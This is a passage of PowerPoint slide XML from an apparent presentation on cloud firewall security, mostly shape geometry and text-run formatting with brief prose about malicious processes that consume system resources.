              <a:rPr dirty="0" sz="2200" spc="-13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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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memory.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264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  <a:tab pos="2453640" algn="l"/>
              </a:tabLst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ca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eithe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	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fa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malicious</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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code.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377298" y="4383786"/>
            <a:ext cx="5226050" cy="23723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marR="128905" indent="-3429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Resourc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fer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P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="7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time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,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sy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m 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memo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alloca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ion,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fixed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di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k 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capacity,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network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utilization.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264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mali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ious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pro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ces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ca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spa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w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n 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multiple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looping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threads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use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these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resources.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7871" y="306451"/>
            <a:ext cx="408051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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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91328" y="760476"/>
            <a:ext cx="5687568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729988" y="1933193"/>
            <a:ext cx="7430134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Services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offered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by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cloud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native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vendor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controls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are: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830243" y="3891121"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="3830243" y="3891121"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3830243" y="3891121"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704339" h="1721485">
                  <a:moveTo>
                    <a:pt x="838436" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791496" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745074" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699255" y="14923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654124" y="24817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609767" y="37077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566270" y="51645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523718" y="68464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482195" y="87478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441789" y="108629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402583" y="131861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364664" y="157116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328117" y="184338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293027" y="213470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259480" y="244454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227561" y="277235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197356" y="311754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168949" y="347956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142427" y="385783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117875" y="425178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95379" y="466084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75022" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56892" y="552202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41074" y="597301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27652" y="643683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7432" y="975833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14897" y="1021649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24784" y="1066778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37037" y="1111133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51599" y="1154630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68413" y="1197184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87422" y="1238707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108569" y="1279116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131797" y="1318324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157049" y="1356247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184268" y="1392798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213398" y="1427892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244380" y="1461443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277159" y="1493366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311677" y="1523576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347877" y="1551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385703" y="1578513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425097" y="1603069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466003" y="1625569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508363" y="1645928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552121" y="1664061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597220" y="1679881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643602" y="1693304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691210" y="1704244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739355" y="1712512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787325" y="1718016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835035" y="1720812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882400" y="1720957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929334" y="1718509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975752" y="1713523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021568" y="1706058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066696" y="1696170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111052" y="1683916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154549" y="1669352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197102" y="1652537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238626" y="1633526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279035" y="1612376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318243" y="1589145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356165" y="1563890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392716" y="1536667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427810" y="1507534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461361" y="1476546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493285" y="1443762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523494" y="1409238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551905" y="1373031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578431" y="1335198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602987" y="1295796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625488" y="1254882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645847" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1663979" y="1168744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679800" y="1123635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693223" y="1077241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704162" y="1029620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860374" y="860456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981509" y="8412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933528" y="2920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885809" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838436" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0ECFE8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991356" y="4052315"/>
              <a:ext cx="1399540" cy="1399540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1399539" h="1399539">
                  <a:moveTo>
                    <a:pt x="699516" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="651622" y="1613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604595" y="6385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558538" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513556" y="24987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469752" y="38608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427231" y="54971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386098" y="73971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346456" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308409" y="119465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272061" y="145752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237518" y="174259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204882" y="204882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174259" y="237518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145752" y="272061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119465" y="308409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95504" y="346456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73971" y="386098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54971" y="427231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38608" y="469752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24987" y="513556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14211" y="558538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6385" y="604595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613" y="651622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="699516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613" y="747409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6385" y="794436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14211" y="840493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24987" y="885475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38608" y="929279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54971" y="971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73971" y="1012933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95504" y="1052576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119465" y="1090622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145752" y="1126970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174259" y="1161513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204882" y="1194149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237518" y="1224772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272061" y="1253279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308409" y="1279566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346456" y="1303527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386098" y="1325060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427231" y="1344060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469752" y="1360423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513556" y="1374044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558538" y="1384820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604595" y="1392646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651622" y="1397418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699516" y="1399032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747409" y="1397418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794436" y="1392646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840493" y="1384820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885475" y="1374044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929279" y="1360423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971800" y="1344060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012933" y="1325060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052576" y="1303527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090622" y="1279566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126970" y="1253279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161513" y="1224772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194149" y="1194149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224772" y="1161513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253279" y="1126970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279566" y="1090622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303527" y="1052576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325060" y="1012933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344060" y="971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360423" y="929279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374044" y="885475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384820" y="840493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392646" y="794436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397418" y="747409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1399032" y="699516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397418" y="651622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392646" y="604595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384820" y="558538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374044" y="513556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360423" y="469752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344060" y="427231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325060" y="386098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303527" y="346456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279566" y="308409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253279" y="272061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224772" y="237518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194149" y="204882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161513" y="174259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126970" y="145752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090622" y="119465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052576" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012933" y="73971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971800" y="54971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929279" y="38608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885475" y="24987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840493" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794436" y="6385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747409" y="1613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699516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4519040" y="4558665"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>01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366183" y="3891121"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="7366183" y="3891121"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7366183" y="3891121"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721485">
                  <a:moveTo>
                    <a:pt x="838469" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791535" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745117" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699301" y="14923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654173" y="24817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609817" y="37077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566320" y="51645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523767" y="68464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482243" y="87478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441834" y="108629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402626" y="131861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364703" y="157116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328153" y="184338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293059" y="213470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259507" y="244454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227584" y="277235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197374" y="311754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168964" y="347956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142438" y="385783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117882" y="425178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95381" y="466084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75022" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56890" y="552202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41069" y="597301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27646" y="643683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16707" y="691292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8439" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2936" y="787406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="835116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="929415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7440" y="975833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14909" y="1021649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24801" y="1066778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37060" y="1111133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51628" y="1154630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68448" y="1197184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87463" y="1238707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108616" y="1279116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131851" y="1318324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157109" y="1356247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184335" y="1392798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213471" y="1427892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244460" y="1461443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277244" y="1493366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311768" y="1523576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347974" y="1551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385805" y="1578513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425204" y="1603069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466114" y="1625569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508477" y="1645928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552238" y="1664061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597338" y="1679881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643722" y="1693304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691331" y="1704244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739475" y="1712512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787445" y="1718016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835155" y="1720812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882520" y="1720957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929455" y="1718509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975872" y="1713523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021688" y="1706058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066817" y="1696170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111172" y="1683916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154669" y="1669352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197223" y="1652537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238746" y="1633526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279155" y="1612376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318364" y="1589145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356286" y="1563890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392837" y="1536667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427931" y="1507534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461482" y="1476546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493405" y="1443762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523615" y="1409238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552026" y="1373031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578552" y="1335198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603108" y="1295796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625608" y="1254882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645967" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664100" y="1168744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679920" y="1123635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693343" y="1077241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704283" y="1029620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860495" y="860456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029659" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981514" y="8412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933544" y="2920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885834" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838469" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EE6360">
                <a:alpha val="3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527035" y="4052315"/>
              <a:ext cx="1399540" cy="1399540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1399540" h="1399539">
                  <a:moveTo>
                    <a:pt x="699516" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="651622" y="1613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604595" y="6385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558538" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513556" y="24987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469752" y="38608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427231" y="54971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386098" y="73971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346455" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308409" y="119465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272061" y="145752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237518" y="174259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204882" y="204882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174259" y="237518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145752" y="272061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119465" y="308409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95503" y="346456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73971" y="386098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54971" y="427231"/>
